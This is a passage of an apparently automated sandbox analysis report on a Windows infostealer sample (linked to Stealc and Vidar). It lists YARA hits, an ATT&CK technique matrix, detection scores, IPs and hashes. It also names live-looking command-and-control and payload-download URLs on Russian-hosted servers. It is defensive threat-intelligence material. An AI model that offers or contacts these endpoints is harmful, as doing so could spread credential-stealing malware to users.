                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.2c70e67.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.3.ED60.tmp.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.ED60.tmp.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Remote Access Functionality

                  barindex
Source: Yara match | File source: 1.3.ED60.tmp.exe.2cb0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ED60.tmp.exe.2c70e67.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ED60.tmp.exe.2c70e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.ED60.tmp.exe.2cb0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ED60.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.ED60.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.1957434387.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ED60.tmp.exe PID: 7532, type: MEMORYSTR
Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_004218DC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_004218DC
Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_00420C06 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_00420C06
Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046F0E6D Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,0_2_046F0E6D
Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046F1B43 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,0_2_046F1B43
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Disable or Modify Tools | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 12 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Create Account | 111 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 3 Clipboard Data | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 22 Software Packing | NTDS | 34 System Information Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 1 Query Registry | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Masquerading | Cached Domain Credentials | 131 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Virtualization/Sandbox Evasion | DCSync | 1 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 111 Process Injection | Proc Filesystem | 11 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

Source | Detection | Scanner | Label | Link
6X4BIzTTBR.exe | 34% | ReversingLabs | |
6X4BIzTTBR.exe | 100% | Joe Sandbox ML | |
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe | 34% | ReversingLabs | |
C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | 34% | ReversingLabs | |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label | Link
http://92.255.57.88/7bbacc20a3bd2eb5.phpM | 100% | Avira URL Cloud | malware |
http://92.255.57.88 | 100% | Avira URL Cloud | malware |
http://92.255.57.88/7bbacc20a3bd2eb5.phpK | 100% | Avira URL Cloud | malware |
http://92.255.57.88BR | 0% | Avira URL Cloud | safe |
http://92.255.57.88/7bbacc20a3bd2eb5.phpf | 100% | Avira URL Cloud | malware |
http://92.255.57.88/_ | 100% | Avira URL Cloud | malware |
http://92.255.57.88/7bbacc20a3bd2eb5.phpb | 100% | Avira URL Cloud | malware |
http://92.255.57.88/System32 | 100% | Avira URL Cloud | malware |
http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE | 0% | Avira URL Cloud | safe |
http://92.255.57.88/t | 100% | Avira URL Cloud | malware |
http://176.113.115.37/ScreenUpdateSync.exekm | 0% | Avira URL Cloud | safe |
http://92.255.57.88/7bbacc20a3bd2eb5.php | 100% | Avira URL Cloud | malware |
http://92.255.57.88/ | 100% | Avira URL Cloud | malware |
https://post-to-me.com/track_prt.php?sub=0&cc=DEH | 100% | Avira URL Cloud | malware |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
post-to-me.com | 172.67.179.207 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://post-to-me.com/track_prt.php?sub=0&cc=DE | false | | high
http://92.255.57.88/7bbacc20a3bd2eb5.php | true | Avira URL Cloud: malware | unknown
http://92.255.57.88/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://92.255.57.88/7bbacc20a3bd2eb5.phpM | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://post-to-me.com/track_prt.php?sub=&cc=DE | 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | | high
http://92.255.57.88 | ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpK | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://post-to-me.com/track_prt.php?sub= | 6X4BIzTTBR.exe | false | | high
http://92.255.57.88/_ | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://92.255.57.88BR | ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpf | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://92.255.57.88/7bbacc20a3bd2eb5.phpb | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://92.255.57.88/t | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE | 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp | false | Avira URL Cloud: safe | unknown
http://92.255.57.88/System32 | ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://post-to-me.com/ | 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://upx.sf.net | Amcache.hve.7.dr | false | | high
http://176.113.115.37/ScreenUpdateSync.exe | 6X4BIzTTBR.exe, 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://176.113.115.37/ScreenUpdateSync.exekm | 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DEH | 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
176.113.115.37 | unknown | Russian Federation | 49505 | SELECTELRU | false
172.67.179.207 | post-to-me.com | United States | 13335 | CLOUDFLARENETUS | false
92.255.57.88 | unknown | Russian Federation | 42253 | TELSPRU | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1563391
                                Start date and time:2024-11-26 22:46:06 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 8m 25s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:9
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:6X4BIzTTBR.exe
                                renamed because original name is a hash value
                                Original Sample Name:5a45cfe0b266362b482cace7205c2c32.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@4/7@1/3
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 97%
                                • Number of executed functions: 48
                                • Number of non-executed functions: 355
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                • VT rate limit hit for: 6X4BIzTTBR.exe
Time | Type | Description
16:47:09 | API Interceptor | 8585338x Sleep call for process: 6X4BIzTTBR.exe modified
16:47:55 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
176.113.115.37 | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | XOr3Kqyo9n.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | 0r9PL33C8E.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | Pw2KHOL9Z8.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | Tg3sk2wywR.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | x8AH98H0eQ.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | x8AH98H0eQ.exe | Get hash | malicious | Unknown | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | zGHItMC5Zc.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
 | ozcAR7VO6Y.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37/ScreenUpdateSync.exe
172.67.179.207 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | XOr3Kqyo9n.exe | Get hash | malicious | Stealc | Browse |
 | 0r9PL33C8E.exe | Get hash | malicious | Stealc | Browse |
 | Pw2KHOL9Z8.exe | Get hash | malicious | Stealc | Browse |
 | o3QbCA4xLs.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | XhYAqi0wi5.exe | Get hash | malicious | Stealc | Browse |
 | Uviv7rEtnt.exe | Get hash | malicious | Stealc, Vidar | Browse |
 | GK059kPZ5B.exe | Get hash | malicious | Stealc | Browse |
 | w12rykWq2L.exe | Get hash | malicious | Stealc | Browse |
 | sgM0Akbldk.exe | Get hash | malicious | Stealc | Browse |
92.255.57.88 | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 92.255.57.88/7bbacc20a3bd2eb5.php
 | 6a969fa1ba45ea3d679dbd124e030d82a0ea879d9f97b.exe | Get hash | malicious | Stealc | Browse | 92.255.57.88/7bbacc20a3bd2eb5.php
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 92.255.57.88/7bbacc20a3bd2eb5.php
 | X4roU7TtF1.exe | Get hash | malicious | Stealc | Browse | 92.255.57.88/7bbacc20a3bd2eb5.php
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
post-to-me.com | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 104.21.56.70
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 172.67.179.207
 | XOr3Kqyo9n.exe | Get hash | malicious | Stealc | Browse | 172.67.179.207
 | 0r9PL33C8E.exe | Get hash | malicious | Stealc | Browse | 172.67.179.207
 | Pw2KHOL9Z8.exe | Get hash | malicious | Stealc | Browse | 172.67.179.207
 | Tg3sk2wywR.exe | Get hash | malicious | Stealc | Browse | 104.21.56.70
 | x8AH98H0eQ.exe | Get hash | malicious | Stealc | Browse | 104.21.56.70
 | x8AH98H0eQ.exe | Get hash | malicious | Unknown | Browse | 104.21.56.70
 | zGHItMC5Zc.exe | Get hash | malicious | Stealc | Browse | 104.21.56.70
 | ozcAR7VO6Y.exe | Get hash | malicious | Stealc | Browse | 104.21.56.70
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
SELECTELRU | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 176.113.115.37
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 176.113.115.37
 | file.exe | Get hash | malicious | Unknown | Browse | 176.113.115.177
 | qlI3ReINCV.exe | Get hash | malicious | Stealc, Vidar | Browse | 176.113.115.215
 | file.exe | Get hash | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | Browse | 176.113.115.203
 | XOr3Kqyo9n.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37
 | 0r9PL33C8E.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37
 | Pw2KHOL9Z8.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37
 | Tg3sk2wywR.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37
 | x8AH98H0eQ.exe | Get hash | malicious | Stealc | Browse | 176.113.115.37
TELSPRU | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 92.255.57.88
 | 6a969fa1ba45ea3d679dbd124e030d82a0ea879d9f97b.exe | Get hash | malicious | Stealc | Browse | 92.255.57.88
 | UzbLVhqAQ9.exe | Get hash | malicious | RedLine | Browse | 92.255.57.31
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 92.255.57.88
 | X4roU7TtF1.exe | Get hash | malicious | Stealc | Browse | 92.255.57.88
 | Ldr-2.dll | Get hash | malicious | Unknown | Browse | 92.255.57.46
 | https://drugfreesport.info/lqb4s | Get hash | malicious | Phisher | Browse | 92.255.57.46
 | Setup.msi | Get hash | malicious | Unknown | Browse | 92.255.57.46
 | https://iop360.net/jsg2n | Get hash | malicious | Unknown | Browse | 92.255.57.104
 | tHvjY1G08Y.exe | Get hash | malicious | Cookie Stealer RedLine SmokeLoader Socelars Zealer Stealer onlyLogger | Browse | 92.255.57.249
CLOUDFLARENETUS | https://cloudserver-filesredir667900989385.s3.eu-central-1.amazonaws.com/6354799604_PDF.html | Get hash | malicious | ScreenConnect Tool | Browse | 1.1.1.1
 | AID0109FLT24DO53CD-F.pdf | Get hash | malicious | Unknown | Browse | 104.18.11.207
 | https://link.edgepilot.com/s/3b095c08/ZyRgSnzc50mRg_8d-46dUQ?u=https://kingdompch.com/ | Get hash | malicious | Unknown | Browse | 104.21.38.19
 | file.exe | Get hash | malicious | Unknown | Browse | 104.21.80.208
 | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 104.21.56.70
 | http://img1.wsimg.com/blobby/go/fae029f6-27b1-4578-94bc-ae0bbaeebde4/downloads/buluxanitoteras.pdf | Get hash | malicious | Unknown | Browse | 104.21.48.245
 | https://eye.sbc31.net/m2?r=wAXNB1S4NjcyYWE1OWU4YjU5ODMzOTIyMDE1MThlxBDQudCvf9DH0Ns5RGzQktCKZ2wrLUbgpHRlc3Sxc2FtcGxlQHNhbXBsZS5jb22sKzMzNjEyMzQ1Njc4kLZEV3ZCbHJ1Y1JZMlFIa1B1LVVTTS1BoA== | Get hash | malicious | HTMLPhisher | Browse | 172.67.140.230
 | https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb | Get hash | malicious | Unknown | Browse | 104.17.25.14
 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 172.64.41.3
 | 635614_thermofisher.comCQDM.html | Get hash | malicious | Unknown | Browse | 104.16.124.96
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | vwkb5DQRAL.exe | Get hash | malicious | Stealc, Vidar | Browse | 172.67.179.207
 | z51awb_shipping.cmd | Get hash | malicious | GuLoader, Remcos | Browse | 172.67.179.207
 | file.exe | Get hash | malicious | Vidar | Browse | 172.67.179.207
 | Viderefrt.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 172.67.179.207
 | Dysacousma41.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 172.67.179.207
 | vhzLtwlZJY.exe | Get hash | malicious | Unknown | Browse | 172.67.179.207
 | IeccNv7PP6.exe | Get hash | malicious | Stealc, Vidar | Browse | 172.67.179.207
 | INV-0542.pdf.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 172.67.179.207
 | MSM8C42iAN.exe | Get hash | malicious | DarkCloud | Browse | 172.67.179.207
 | November Quotation.exe | Get hash | malicious | GuLoader, MassLogger RAT | Browse | 172.67.179.207
                                                    No context
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):65536
                                                    Entropy (8bit):0.9637118487705912
                                                    Encrypted:false
                                                    SSDEEP:96:OMe9Gt2uZsVwEnSRfKQXIDcQVc6soGcE+cw3Q+HbHg/8BRTf3o8Fa9OyRgTvXNta:fOuZj07IzEtj/XZrP2izuiF3Z24IO8N
                                                    MD5:FAAF86B0373DE2169A5FF627383C78BF
                                                    SHA1:4B250D092ABB8EB2FDD8412C2CF143DE7ECEF444
                                                    SHA-256:92600848A4D1502C7A4CEEDA6CFDFDB3525548B6D980BB01FB015BAF60153002
                                                    SHA-512:870AC9366839493FB8ACF98E5727E96228A93FDE2ECFD866D91186D01C6F3A2F261F3EA081FF5C582BF823D91B32043B75462E4AAE83EF265C7E6EDCDA3D051B
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.1.3.1.2.5.0.1.6.5.5.1.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.1.3.1.2.5.0.6.9.6.7.5.2.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.4.d.5.a.2.c.-.7.7.b.a.-.4.8.d.f.-.a.d.2.f.-.9.0.7.d.e.3.1.0.1.3.5.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.4.8.7.7.4.8.5.-.f.e.0.1.-.4.f.1.c.-.a.f.e.6.-.b.8.d.6.4.5.d.3.4.a.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.D.6.0...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.6.c.-.0.0.0.1.-.0.0.1.4.-.e.6.4.9.-.e.c.b.f.4.c.4.0.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.e.6.1.1.6.5.a.c.4.f.3.1.f.c.b.9.e.a.0.d.6.c.6.4.e.9.3.7.6.4.0.0.0.0.1.6.0.2.!.0.0.0.0.6.a.e.3.6.8.e.7.f.a.c.f.d.0.0.2.3.6.f.4.1.9.a.2.a.0.a.d.e.6.9.0.c.6.0.c.b.d.8.3.!.E.D.6.0...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Mini DuMP crash report, 14 streams, Tue Nov 26 21:47:30 2024, 0x1205a4 type
                                                    Category:dropped
                                                    Size (bytes):61290
                                                    Entropy (8bit):1.8495091266436758
                                                    Encrypted:false
                                                    SSDEEP:192:Ls8YiJX8bWDwX5VOQOJwPZV7VimtBS3LClyUoBa9fdi2wdjdKfVM0NP8fV:LHYvbWDy4QEWumLlrTmxP02N
                                                    MD5:51090864228B31FB64CB675CE2927C80
                                                    SHA1:BC9857B7F47E71EFE30F82ECAA1397F308A3D559
                                                    SHA-256:B169A222AC44AB9FEB7D42A8EA98BFBEE0DBF41FCF4E734ECC174E71F965B39E
                                                    SHA-512:04474DE80451AF1E3ED424F5BA533422598BB5ED7F779301FF793CEF16F23B0E28078D3B626DA3770CE3E33F6DAC76668F3AD72E7E7E5900DADF370A772AF1F5
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:MDMP..a..... ........AFg............4...............<.......t....*..........T.......8...........T............2..........................................................................................................eJ......H.......GenuineIntel............T.......l....AFg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
